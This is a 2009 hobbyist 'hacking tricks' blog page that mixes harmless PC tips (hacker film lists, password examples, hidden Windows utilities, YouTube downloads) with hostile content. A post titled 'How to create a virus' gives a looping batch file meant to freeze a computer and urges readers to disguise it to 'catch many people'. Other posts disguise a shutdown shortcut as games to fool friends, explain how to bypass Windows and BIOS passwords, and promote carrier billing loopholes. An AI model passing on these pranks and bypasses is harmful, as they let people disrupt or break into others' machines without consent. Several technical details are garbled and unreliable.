Visits

Friday, May 22, 2009

Top 20 Hacker Movies

http://www.delmarscene.com/data/photos/vspot_top_20.jpg
While none of these next 20 movies depicts the true motions of computer hacking, most of these stories are memorable in some way. Most are good escapist fun. Some are visually stunning. A few of these movies are even powerful social commentaries. No, you won't learn secret root command lines or packet sniffing by renting these films, folks. But if you want some entertaining DVD rentals involving computers and crime, here are the 20 Best Hacker Movies...

(In no particular order, as voted on by a panel of opinionated About.com judges:)

20) The Net (1995)
19) Takedown (2000)
18) Pirates of Silicon Valley (1999)
17) The Matrix (1999)
16) Hackers (1995)
15) The Conversation (1974)
14) Antitrust (2001)
13) Real Genius (1985)
12) Mission Impossible (1996)
11) The Thirteenth Floor(1999)
10) Swordfish (2001)
9) The Italian Job (2003)
8) Foolproof (2003)
7) eXistenZ (1999)
6) The Score (2001)
5) Sneakers (1992)
4) Revolution OS (2001)
3) Die Hard 4: Live Free or Die Hard (2007)
2) Wargames (1983)
1) Tron (1982)

How to create a Strong Password

http://lh6.ggpht.com/zuoxingyu/SA1oqFQYf5I/AAAAAAAABeQ/1sHO_Vc6O0c/s288/1password%20v2.5.1.2.jpg
"Hackers have managed to steal passwords of 200 million Facebook users through phishing"

Hackers are now headache for netizens.
Try to give a strong password for your accounts.
But HOW...

Here is some Example for strong Password:

OK Password:

Better Password:

Excellent Password:



kitty 1Kitty 1Kitty@
susan Susan53 .Susan53.
jellyfish jelly22fish Jelly22fish&
smellycat sm3llycat $Sm3llycat$
warcrafter warcrafter77 %Warcrafter77@
suzukirider suzuk1r1der =Suzuk1r1der=
doctorhouse doctorh0use .DoctorH0use.
adamsandler adams@ndler #adams@ndler=
ilovemypiano ILoveMyPiano (ILoveMyPiano1)












Fun with Browser

http://farm4.static.flickr.com/3082/2564377033_a371024d61_m.jpg
Here is a funny trick with browser

Copy and paste the java script code to the address bar of your browser

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)


Find Who is Invisible on Yahoo Messenger


http://www.ustadz.net/wp-content/uploads/2008/04/invisible-yahoo-messenger.jpg

Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline, they may in the 'Invisible' mode. This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:


2. If the user is online, after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below. So you know that the user is online.


How to Run Multiple Instance of Google Talk simultaneously!

http://farm2.static.flickr.com/1008/734892136_e68d5ac074.jpg
Users of Google Talk (GTalk) can also let GTalk go to polygamy, that’s running multiple instances of Google Talk and login to multiple Google accounts on Google Talk. The polygamy trick can be done without any crack, patch or hack, with just a simple command line parameter or switch /nomutex appended to the Google Talk shortcut.

You can add the /nomutex switch or parameter to existing Google Talk shortcut, or create a new shortcut with the /nomutex command line parameter.

To edit existing Google Talk shortcut:

1) Right click on the Google Talk shortcut.
2) On the right click contextual menu, click on Properties.
3) Go to Shortcut tab on Google Talk Properties window.
4) On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).

Target: "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex

5) Click on OK.


To create a new shortcut for Google Talk:

1) Right-click on the desktop or anywhere you want to place the GTalk shortcut.
2) Select New on the right click context menu.
3) Then select Shortcut.
4) Copy and paste the following line to the text box when prompted to type the location of the item:

“C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex

5) Click on Next.
6) Give the shortcut a proper name such as Google Talk or Google Talk Multiple or Google Talk Polygamy.
7) Click OK until you are done.

How this Works?
The mutex is short for mutual exclusion object.
A mutex is a program object that allows multiple program threads to share the same resource, but not simultaneously.

So, in the hack above, we used nomutex (no-mutex) to use the same resources simultaneously....!

Saturday, May 16, 2009

Hidden Applications in Windows

In windows there is many hidden applications.
To run any of these apps go to Start > Run and type the executable name (ie charmap).

1) Character Map = charmap.exe (very useful for finding unusual characters)

2) Disk Cleanup = cleanmgr.exe

3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)

5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)

6) Private character editor = eudcedit.exe (allows creation or modification of characters)

7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)

8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).

9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).

10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)

11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).

12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )

13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).

14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).

15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).

16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).

17) File siganture verification tool = sigverif.exe

18) Volume Contro = sndvol32.exe (I've included this for those people that lose it from the System Notification area).

19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).

20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).

21) Microsoft Telnet Client = telnet.exe

22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).

23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).

24) System configuration = msconfig.exe (can use to control starup programs)

25) gpedit.msc used to manage group policies, and permissions

Monday, May 11, 2009

How to create a virus

pc_virus_threat_350o.jpg (350×267)
Using notepad,u can even create a trojan virus... But now I'm going to teach one of my personal favourite virus-NOTEPAD MULTIPLIER
Just do the following steps in your PC
Open notepad..
Type
'@echo off
:start
open notepad
goto start'
(no inverted commas)
save it as notepad multiplier.bat
and you're done.

Open it and you'll see a thousand notepads,and will go on opening until ur computer gets freezed.
Do name it attractively to catch many people ;)

Wednesday, May 6, 2009

Download Youtube videos in ".mp4" format




U can Download Youtube video in mp4 format without using any software or any website using a simple javascript.

Below is the code to download a video from the you tube,copy-paste this code into the address bar when your desired video starts buffering.

Copy this script into address bar:

javascript:if(document.location.href.match(/http:\/\/[a-zA-Z\.]*youtube\.com\/watch/)){document.location.href='http://www.youtube.com/get_video?fmt='+(isHDAvailable?'22':'18')+'&video_id='+swfArgs['video_id']+'&t='+swfArgs['t']}

Friday, May 1, 2009

Keyboard hidden symbols

http://technabob.com/blog/wp-content/uploads/2007/08/luxeed_keyboard_black.jpg

There are lots of hidden symbols in ur keyboard...for example have'nt u noticed the TM symbol,copyright symbol,registered symbol,music notes etc. To get these symbols,just hold the alt key in your keyboard and type any number on the numpad on the right of the keyboard (dont use the nums on the top of alphabets,laptop users can use 'on-screen keyboard) and leave the alt key.

Eg:
alt+O169 = ©
alt+0153 = ™
alt+0174 = ®
alt+0188 = ¼
alt+0189 = ½
alt+0190 = ¾
alt+0191 = ¿


alt+1=☺

alt+2=☻

alt+3=♥

alt+4=♦

alt+5=♣

alt+6=♠

alt+7=•

alt+8=◘

alt+9=○

alt+10=◙

alt+11=♂

alt+12=♀

alt+13=♪

alt+14=♫

alt+15=☼

Lock your desktop wallpaper

http://www.foolproofsoftware.com/images/Desktop_security_splash.jpg
Are you tired of setting your favourite picture as wallpaper everytime when others who use the pc change them? No more worry,here's a simple trick for xp users
>goto 'run'.
>type 'gpedit.msc'
>goto 'adminstrator policy'
>browse yourself and find what you can do with your computer....

you can do any thing and everything in your computer using gpedit

Nameless folders in PC!!!

Nameless folders in PC - folder
You can create nameless folder....yeah.
What you are supposed to do is -
Select the desired folder.
Press f2 or click rename
Hold [alt] key while typing 0160

You can also type
Alt + 255

Free songs for AirTel users in Kerala!

Free songs for AirTel users in Kerala - music
Now u can enjoy songs absolutely free from ur nokia 1110,1280...etc too!!!
Just dial...
550550
550551
550552
550553
550554
550555
550556
550557
550558
550559

EnJoY D sOnG:->

Download videos from YouTube Freely!

http://cbae.nmsu.edu/wordpress/wp-content/uploads/2008/07/logo-youtube.gif

HI
I AM GOING TO SHOW YOU HOW TO DOWNLOAD VIDEOS FROM THE YOUTUBE WORLD WITHOUT ANY ANNOYING PROGRAM
SO
STEP 1
SELECT THE VIDEO THAT YOU WANT TO DOWNLOAD
THEN AT THE ADDRESS BAR,AT THE VERY TOP,YOU KNOW
REPLACE THE FOLLOWING LINE www.youtube WITH get2pc

for example
http://www.youtube.com/watch?v=GPewJLMSZJg
WE REPLACE:"www.youtube" AND WE PUT "get2pc"
AND ITS SOMETHING LIKE THIS
http://get2pc.com/watch?v=GPewJLMSZJg
AT THAT PAGE YOU WILL SEE THE SELECTED VIDEO AND ITS READY TO DOWNLOAD

BEWARE
WHEN YOU SAVE VIDEO IT WILL BE AUTOMATICALLY SAVED WITHOUT ANY EXTENSION AND THE VIDEOS NAME WILL BE "get_video" RENAME WITH ANY NAME AS YOU LIKE WITH AN EXTENSION ".FLV"
THE FILE WILL BE AN FLASH PLAYER SO YOU WILL NEED TO HAVE FLASH PLAYER
INSTALL IT FROM SOMEWHERE AND ALSO IF YOU WANT CONVERT IT TO ANY OTHER FORMAT

Free lifetime validity for Airtel (india)

Exciting offer from Airtel
Free lifetime validity for Airtel - imagespj
Yes,this works...get unlimited validity on your airtel mobile freely by just sending YES to 750. Its real and catch up this offer before they call it off!

Free Internet using Airtel (india)

Check this Out
Free Internet using Airtel 2 - qgynbjgkube

http://wap.google.com/gwt/n?u=http://www.google.com
or any other website,no wapsites!! Orkut and gmail are not free :(
and click ok.Start free browsing!!! Downloading is not free!
2)
Goto https://concealme.com and type any web address on the page...downloading too is free. Keep the balance less than one rupee. You can also visit wap sites.
To use airtel live when the balance is below Rs 15,first activate mo by calling *567*1# and when activated switch off the phone for two hours..switch on and enjoy
These trick really worked for me with airtel live in kerala...and i assure you it really does work

Break XP user password

Are you locked up with a start up password?
Well,have some fun! Open your computer. Press F8 button repeatedly before booting to open boot mode page. Select safe mode. In the previous windows version,you can logg in to user account without typing password,but its blocked in Vista. Now goto run. Type
"controluserpassword2"
check on the administrator account and click on reset.

There's another method. On the password screen,press alt + ctrl + del .
Now type 'administrator' on the user tab.
Ok. Done! Now goto run and reset the password.
But it wont work if the user account is an administrator account

Hack Computer BIOS password!

Have you forgotten your bios or cmos password? Or are you looking for hacking them. Its easy if you have a screw driver!!
First, a question,why dont computer forget the bios password,or time,date even if we keep it unplugged for a long time.
Yeah,it has got some power back up,or a battery inside it. Have you noticed a small coin sized battery on the mother board of your computer.
Remove it,rub it and after sometime,keep it back!
You're done! Now start happy computing!!

The Bios password is stored in CMOS memory that is maintained by the battery in the motherboard. So we attack the battery !

Shutdown Shortcut!

Create shortcuts of shutdown in your desktop. Rename them as games or songs and fool your friends!! Its simple
Right click on the desktop>new>shortcut
Type 'shutdown -s'
Click next
Name the icon as games or anything...

Google Search on your Mobile!

Hey friends,now you can search google through sms (india). No! Its not really free but you can make it free if you could recharge your mobile with sms packs (to have free national sms) . All you got to do is send what you want to 9773300000.
To know cricket scores,send CRI
To know train timings,send TRAINS (name of your station) TO (name of the destination station)
To get word meanings,send D (any word)
There are many more facilities like flight timings,business...etc.
Messages to the no. will be charged as of a national sms,unless you have free national sms.

Hackers Bay Wallaper

About us

Hackers Bay
Cuz there's no help


Step into the Magnificient world of Hackers Bay. Now you're the ruler of your world,cross the boundaries,and watch what you've got beyond them!
Rule out the monopoly of the softwares. Welcome ,to the world of hacking.

Please vote for the Site.
:)

Disclaimer: All the information in these site are for the sole purpose of providing you knowledge. Acting on the informations given may be illegal and I hold no responsibility for any damage caused!
I wont compell anyone to try these tricks!

Copyrighted 2008-09
All right reserved,Hackers Bay and its logo are registered trademarks of Hackers Bay Corporation